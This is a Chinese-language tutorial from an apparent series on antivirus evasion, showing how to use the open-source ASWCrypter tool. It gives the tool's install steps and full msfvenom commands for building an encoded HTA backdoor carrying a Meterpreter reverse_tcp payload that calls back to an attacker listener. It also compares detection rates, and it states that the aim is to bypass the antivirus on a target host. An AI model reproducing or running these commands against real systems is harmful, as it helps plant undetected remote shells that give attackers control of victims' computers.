远控免杀专题(18)-ASWCrypter免杀

免杀能力一览表

几点说明：

1、上表中标识 √ 说明相应杀毒软件未检测出病毒，也就是代表了Bypass。

2、为了更好的对比效果，大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。

3、由于本机测试时只是安装了360全家桶和火绒，所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2020.01.01)，火绒版本5.0.34.16(2020.01.01)，360安全卫士12.0.0.2002(2020.01.01)。

4、其他杀软的检测指标是在virustotal.com（简称VT）上在线查杀，所以可能只是代表了静态查杀能力，数据仅供参考，不足以作为免杀或杀软查杀能力的判断指标。

5、完全不必要苛求一种免杀技术能bypass所有杀软，这样的技术肯定是有的，只是没被公开，一旦公开第二天就能被杀了，其实我们只要能bypass目标主机上的杀软就足够了。

一、ASWCrypter介绍

ASWCrypter是2018年开源的免杀工具，原理比较简单，使用msf生成hta代码，然后使用python脚本对hta代码进行一定编码处理，生成新的hta后门文件，从而达到免杀效果。

二、安装ASWCrypter

需要本机安装metasploit和python环境。

ASWCrypter的安装比较简单,先git clone到本地

git clone https://github.com/AbedAlqaderSwedan1/ASWCrypter.git

进入ASWCrypter目录，执行chmod +x ./ASWCrypter.sh。

执行./ASWCrypter.sh即可运行ASWCrypter。

三、ASWCrypter使用说明

使用时需要注意的只有一点，就是要在linux桌面环境中运行，因为在ASWCrypter.sh脚本中，调用msfvenom生成后门时使用了xterm。

xterm -T "SHELLCODE GENERATOR(ASWCrypter)" -geometry 100x50 -e "msfvenom -p $paylo LHOST=$lhost LPORT=$lport -i 43 -f hta-psh > $getPATH/output/chars.raw"

四、利用ASWCrypter生成后门

执行./ASWCrypter.sh，选择G，第一步也只有这个能选

然后输入LHOST和LPORT

后门选择payload,我还是选择最常规的reverse_tcp了,文件名就随便输一个了

之后提示生成test4.hta成功，后面会提示是否开启msf监听，我这就不需要了，还是在mac上监听端口。

不开杀软的时候可正常上线

打开杀软，火绒静态和动态都能查杀，360动态+静态都没报警。

试了下msfvenom生成的原始的hta文件的查杀率


msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f hta-psh -o test5.hta

virustotal.com上查杀率为28/56

五、ASWCrypter小结

ASWCrypter是使用msfvenom生成基于powershell的hta后门文件，然后进行编码处理，达到一定的免杀效果，不过因为会调用powershell，行为检测还是很容易被检测出来。

六、参考资料

官方Github:https://github.com/abedalqaderswedan1/aswcrypter